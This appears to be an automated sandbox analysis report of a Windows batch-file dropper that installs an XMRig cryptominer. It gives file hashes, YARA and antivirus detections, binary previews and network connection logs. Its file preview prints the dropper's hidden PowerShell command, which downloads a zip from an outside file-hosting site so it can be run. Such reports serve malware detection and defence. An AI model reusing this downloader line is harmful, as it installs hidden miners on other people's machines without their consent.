                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):42500905
                                                                                                                                                                                                                              Entropy (8bit):7.985488590460096
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:786432:pgUSPEDymYKnxxB+6XFiVAICort6Ka8lPyDBfn0ce+Aiqce2P8SlM0rjp37bBZcE:prSP0ymYKnnrKuoU8Qfe3HSA0Hp3vFd
                                                                                                                                                                                                                              MD5:56DEA9A02626E5DF7FE635C39F019C5A
                                                                                                                                                                                                                              SHA1:260179C8DA745AF2A479D17B1A1B7623B62455C7
                                                                                                                                                                                                                              SHA-256:FDFFDD9745F0369E4AF642CA91AE5ECDEEEBD9DD4C4418BB5075773375AFFB4E
                                                                                                                                                                                                                              SHA-512:C172E2C5C719C56B4E315B007FCC9D2DF1DC7EBC09F1160187614B8A17DA68C5873A6F39987273A4C2BF6E2CD61672AA5389BE6F2CE656ABE2428AEC4A5AE8BC
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Local\Temp\temp.zip, Author: Joe Security
                                                                                                                                                                                                                              Preview:PK..........X.............. .WinRing0x64.sysux.............UT....'fS.Uf.|Vf.y.\.]..=..ZTT.....E+..I.".h...fjfBD{.S....P.I..6.*!e..d)[B.;.. .<.....{.....3.3.r.s.u....};.dA|...@.r!...(...>P%Tk%....j...v5.0*....2.#...4.......14<...v..G....qq.u..........sb..^{.`.p.(.F.`.0.G...Z..S...Sut.. r....!}..C. Q.....Bd.'......3.@p,..@.+Z.&6KH...}...|..@!2...A. ..ob...Z....|...C......~B.?+:,.Z....x..}W}..a:.r +...0..d..}.T..$..1H...yr.?.].....1P9...H.....>.iw..6.'...0..`..w.<9.....}.o.u!qZ<H...H.....E.#.S!e.z.r.......!.Z.....k,. H...s....\..Z....W...6..'....z(8Y. ..$....99dl.U......@.D{.....]Ak.Wn.$Bz.[.<...tdNo.........<N3).%.....B.......R$6K]a9X.L.\gL.&q..(GJ..%.Bu...$S..H0.J....d...p,..57.,.f.....C.+.Y{.....Ax.<.G`.E8.=..)(..A...b..@..,.X.jA:K..Y.D.&..(0..H.g.k...GZ2..BXM.).(.(............A3,rf..R!...#...S..|...7._7. .7....i..5r..`..Z.......m.Z!~.....y.....=O.X...K1....E. .5.>F..1..^...._..4n..>.o})I(...H.....".....`@..T.'!..G..8....D.....g..(d.i.46.........
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):49374208
                                                                                                                                                                                                                              Entropy (8bit):6.09495089462158
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:98304:TCoJ5oT1251rgz1dg+1frLN1GtrH1g1D41G1ZoQxyH0yHhdWm+cZkQx5Q0VkJVJu:TCC55hgzrg+txO7QsA1ZoQ7QoxgN
                                                                                                                                                                                                                              MD5:D5A072278E78E6E2D599A69E6C026D04
                                                                                                                                                                                                                              SHA1:5A37CC8953B06BFDCE7A33612C68D7A7D40BA4C2
                                                                                                                                                                                                                              SHA-256:3B9173261DF464C7E516CF6B2B794840BFA9292877EAEC5CF00175D5F36505E0
                                                                                                                                                                                                                              SHA-512:65BA86A6C417EA0166167AA87CE592D213ACA00BFABEADF49E0464CBD86DC45E9F66C045E8F8860FE4D94E0F53EF93D178B55BB6391DF71406801AC14F052537
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Local\Temp\xmrig-cuda.dll, Author: Joe Security
                                                                                                                                                                                                                              Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$........J..$...$...$..'...$..!.#.$.. ...$......$...!...$... ...$...'...$..%...$...%...$.....$...%.@.$.a. ...$.a.!...$.Y. ...$.Y.!...$.Y.$...$.Y....$......$.Y.&...$.Rich..$.........................PE..d....o.e.........." ......................................................................`..........................................&.......(..P....P...Y...p..0?..............x...............................(... ...8............................................text............................... ..`.rdata..JF.......H..................@..@.data...$,...@.......(..............@....pdata..0?...p...@...>..............@..@.nv_fatb.u.......v...~..............@..@.nvFatBi.....0......................@..@_RDATA.......@......................@..@.rsrc....Y...P...Z..................@..@.reloc..x............R..............@..B................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6360576
                                                                                                                                                                                                                              Entropy (8bit):6.6286185002812745
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:98304:AwHlVzThdquIJ3mH6KfTSr2tJCkN3dOauqMAC2Taf43TZquOE2:fVz5CkN3dXuq9Taf4jLt2
                                                                                                                                                                                                                              MD5:C0F8959614AE06561216158D78A787E5
                                                                                                                                                                                                                              SHA1:73167D1FD0CEE1C96A6505606D21CBFE4369EB00
                                                                                                                                                                                                                              SHA-256:E199D88569FB54346D5FA20EE7B59B2EA6F16F4ECCA3EA1E1C937B11AAB7B2B0
                                                                                                                                                                                                                              SHA-512:A24FCF344D08C64AC301D5E4979F062B5E28E8E4ACF1D2790916149FFE7726B0C4A11E0775AEBA6B841D2D5081E1BD13E2B80390BF9BFBC44D67E54EC07CD746
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Local\Temp\xmrig.exe, Author: Joe Security
                                                                                                                                                                                                                              • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\xmrig.exe, Author: unknown
                                                                                                                                                                                                                              • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\user\AppData\Local\Temp\xmrig.exe, Author: Florian Roth
                                                                                                                                                                                                                              • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\user\AppData\Local\Temp\xmrig.exe, Author: ditekSHen
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................f.......f..>....k.......k.......k.......f..........t....f......8k......8k......8k......8kR.......:.....8k......Rich............................PE..d.....'f..........".......A..`I.......=........@.............................`............`...................................................[......@...Y... .......................RX......................TX.(....RX.8.............A.`............................text.....A.......A................. ..`.rdata...h....A..j....A.............@..@.data...4.*.. \.......\.............@....pdata....... ........].............@..@_RANDOMXV............_.............@..`_TEXT_CN.&.......(...._.............@..`_TEXT_CN.............._.............@..`_RDATA.......0........_.............@..@.rsrc....Y...@...Z...._.............@..@.reloc...............X`.............@..B................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6225
                                                                                                                                                                                                                              Entropy (8bit):3.745423733626983
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:WtX2jbuFCFU2082ukvhkvklCywUA2jxSl68SogZolJzJag2jxSlJ8SogZolJzJO1:WcjqFCKrokvhkvCCt12jxSUHe2jxSNHb
                                                                                                                                                                                                                              MD5:305D1D7EE468EE768FB9442650CBCA4A
                                                                                                                                                                                                                              SHA1:E6A3DCEE2195671A8AB0E7BB131D8C76C6A831B2
                                                                                                                                                                                                                              SHA-256:C6337A1AB1A6783BB39769DC66A1F8BD4B9A8BA2166C4A583ABE5C5522DB4189
                                                                                                                                                                                                                              SHA-512:8B6F645E9BC0A95B471032558926925BD83854E26DCAC13CEF44CE80C729DB95BEB1C7875891B7A152776AA4D3CA241BC7D2B393CA0E7456F9AADC9A35E329C0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:...................................FL..................F.".. .....*_.....s..G..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_........G......G......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.Y8K..........................3*N.A.p.p.D.a.t.a...B.V.1......Y6K..Roaming.@......EW.=.Y6K..........................z/=.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Y4K..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Y4K..............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Y4K....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Y4K....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=.Y<K....9...........
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6225
                                                                                                                                                                                                                              Entropy (8bit):3.745423733626983
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:WtX2jbuFCFU2082ukvhkvklCywUA2jxSl68SogZolJzJag2jxSlJ8SogZolJzJO1:WcjqFCKrokvhkvCCt12jxSUHe2jxSNHb
                                                                                                                                                                                                                              MD5:305D1D7EE468EE768FB9442650CBCA4A
                                                                                                                                                                                                                              SHA1:E6A3DCEE2195671A8AB0E7BB131D8C76C6A831B2
                                                                                                                                                                                                                              SHA-256:C6337A1AB1A6783BB39769DC66A1F8BD4B9A8BA2166C4A583ABE5C5522DB4189
                                                                                                                                                                                                                              SHA-512:8B6F645E9BC0A95B471032558926925BD83854E26DCAC13CEF44CE80C729DB95BEB1C7875891B7A152776AA4D3CA241BC7D2B393CA0E7456F9AADC9A35E329C0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:...................................FL..................F.".. .....*_.....s..G..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_........G......G......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.Y8K..........................3*N.A.p.p.D.a.t.a...B.V.1......Y6K..Roaming.@......EW.=.Y6K..........................z/=.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Y4K..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Y4K..............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Y4K....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Y4K....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=.Y<K....9...........
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6225
                                                                                                                                                                                                                              Entropy (8bit):3.7456504072813934
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:WtS2jbuFCFU2i82ukvhkvklCywUA2jxSlJ8SogZolJzJag2jxSlJ8SogZolJzJO1:W5jqFCKNokvhkvCCt12jxSNHe2jxSNHb
                                                                                                                                                                                                                              MD5:0D64055D05FE2A0DD2F2DE5C8BD3A4E5
                                                                                                                                                                                                                              SHA1:B3BC1AC83220749F163C255AE66B3399F5373C18
                                                                                                                                                                                                                              SHA-256:BFF9FD8E60221B9BC95120EDFECA5E3E603BD9BF9ECDA7ECDB7EB5307506271C
                                                                                                                                                                                                                              SHA-512:9F8099FF94456F96958EE58FA5517A7AC770C70CB475BA238A200CB04BA4FB90D5AB560A2A4C62CD3C464EC67B032BB92A1D51C6FFE3AC7A3C12F94F6CB6B003
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:...................................FL..................F.".. .....*_.....s..G..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_........G.......G......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.Y8K..........................3*N.A.p.p.D.a.t.a...B.V.1......Y6K..Roaming.@......EW.=.Y6K..........................z/=.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Y4K..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Y4K..............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Y4K....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Y4K....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=.Y<K..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=.Y<K....9...........
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6225
                                                                                                                                                                                                                              Entropy (8bit):3.745423733626983
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:WtX2jbuFCFU2082ukvhkvklCywUA2jxSl68SogZolJzJag2jxSlJ8SogZolJzJO1:WcjqFCKrokvhkvCCt12jxSUHe2jxSNHb
                                                                                                                                                                                                                              MD5:305D1D7EE468EE768FB9442650CBCA4A
                                                                                                                                                                                                                              SHA1:E6A3DCEE2195671A8AB0E7BB131D8C76C6A831B2
                                                                                                                                                                                                                              SHA-256:C6337A1AB1A6783BB39769DC66A1F8BD4B9A8BA2166C4A583ABE5C5522DB4189
                                                                                                                                                                                                                              SHA-512:8B6F645E9BC0A95B471032558926925BD83854E26DCAC13CEF44CE80C729DB95BEB1C7875891B7A152776AA4D3CA241BC7D2B393CA0E7456F9AADC9A35E329C0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:...................................FL..................F.".. .....*_.....s..G..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_........G......G......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.Y8K..........................3*N.A.p.p.D.a.t.a...B.V.1......Y6K..Roaming.@......EW.=.Y6K..........................z/=.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Y4K..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Y4K..............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Y4K....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Y4K....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=.Y<K....9...........
                                                                                                                                                                                                                              Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                              Size (bytes):2464
                                                                                                                                                                                                                              Entropy (8bit):3.2440433931189547
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:QOaqdmuF3rP+kWReHgHttUKlDENh+pyMySn6tUKlDENh+pyMySwwIPVxcwIPVxwz:FaqdF7P+AAHdKoqKFxcxkFv
                                                                                                                                                                                                                              MD5:639F7B0410432ADC0D53737C752B1197
                                                                                                                                                                                                                              SHA1:952F7EA9DBD7329F54BEEEB2E2BA74385BF62A27
                                                                                                                                                                                                                              SHA-256:9C74FC0C5A2E62F5A974AA072BBD6B3AD6E2055D30E9F484E20565A8FE50DC16
                                                                                                                                                                                                                              SHA-512:709FA8D37B5FB81E4BE343C0C586F2A36EE8826CD03338730B14B8CE9272F34EF08896C64133A0D983A510349CE618EEE6D02DC7F0BB020C6AAD96663149ECFF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. D.e.c. .. 0.6. .. 2.0.2.4. .0.6.:.2.1.:.0.4.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.
                                                                                                                                                                                                                              Process:C:\ProgramData\.logstxt\xmrig.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):107
                                                                                                                                                                                                                              Entropy (8bit):4.938596692401838
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:oVXR5a3Qo5ICkREMRdRjIAdAtQLQAKXN9dAlQIcC0dAry:o9z3FtVIApMR9oc9f
                                                                                                                                                                                                                              MD5:4847EAFD4B602EFD85B7E4462EF92489
                                                                                                                                                                                                                              SHA1:5D4830DC60BCB320D1803BF0C5D08E135AFED7D4
                                                                                                                                                                                                                              SHA-256:51C971CCE1D8BA87927EBACFDE7D2DF191CFA4434D1B907C609876A5129EC5D3
                                                                                                                                                                                                                              SHA-512:397156C419D82086FC9CF454813695E4FAB4A79960574691EF30CAEC6087CE8BB93614277EDC7DC012107543EEDEF9C8FFB29638DB94C615D7E9F8968E59755E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:[2024-12-06 08:15:39.460] C:\ProgramData\.logstxt\xmrig.exe: unsupported non-option argument 'xmrig.exe'...
                                                                                                                                                                                                                              File type:DOS batch file, Unicode text, UTF-8 text, with very long lines (465)
                                                                                                                                                                                                                              Entropy (8bit):5.226660168824692
                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                File name:2zirzlMVqX.bat
                                                                                                                                                                                                                                File size:893 bytes
                                                                                                                                                                                                                                MD5:6ef6ab582b21c376ef719396f9fe2205
                                                                                                                                                                                                                                SHA1:dc0dffecbe4bd556e5fa977464b2d16a3557ccc6
                                                                                                                                                                                                                                SHA256:2401c15ca787d7143719e3e28c06d54034fad38352138ce48c082fb79d5859be
                                                                                                                                                                                                                                SHA512:9cf4bf173f4e5252674d2e526fd4998eb9d27fd3c38838068324522bbe35ce135cbba72cc26373e1b226b5f5c1d3d9b30f783e404e4eaa47f17e4ad52d7442ed
                                                                                                                                                                                                                                SSDEEP:24:GEhahAbIMurZFBMtXtwrHHMvGt8geDahA7WIArZFEa4gWew3:GEUKIMurZFBMptwrHyGBnDIArZFEa43R
                                                                                                                                                                                                                                TLSH:4F1100722145018CC281958DA458AF4A9F5B6488311F7AAB1694C14CB950BE4CAAE6DD
                                                                                                                                                                                                                                File Content Preview:@echo off.echo Kuruluyor, l..tfen bekleyiniz....powershell.exe "cd $env:TEMP; Start-Process powershell -ArgumentList '-WindowStyle hidden cd $env:TEMP; Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/d6pvcr.zip
                                                                                                                                                                                                                                Icon Hash:9686878b929a9886
                                                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                2024-12-06T10:27:00.194562+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749831108.181.20.35443TCP
                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                Dec 6, 2024 10:25:57.770021915 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:25:57.770051956 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:25:57.770145893 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:25:57.783080101 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:25:57.783092022 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:25:59.532846928 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:25:59.533083916 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:25:59.541336060 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:25:59.541348934 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:25:59.541634083 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:25:59.554097891 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:25:59.595330000 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.332732916 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.332761049 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.332779884 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.332886934 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.332899094 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.332973003 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.378309965 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.378344059 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.378418922 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.378431082 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.378472090 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.378472090 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.473407984 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.473436117 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.473537922 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.473563910 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.473634005 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.532083035 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.532105923 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.532236099 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.532248974 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.532332897 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.578037977 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.578056097 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.578095913 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.578109980 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.578180075 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.578180075 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.605686903 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.605725050 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.605775118 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.605783939 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.605834961 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.631628036 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.631658077 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.631716013 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.631726980 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.631778002 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.631846905 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.660512924 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.660537958 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.660638094 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.660645008 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.660706043 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.687500000 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.687530041 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.687602043 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.687608957 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.687643051 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.687661886 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.706641912 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.706672907 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:00.706774950 CET49699443192.168.2.7108.181.20.35
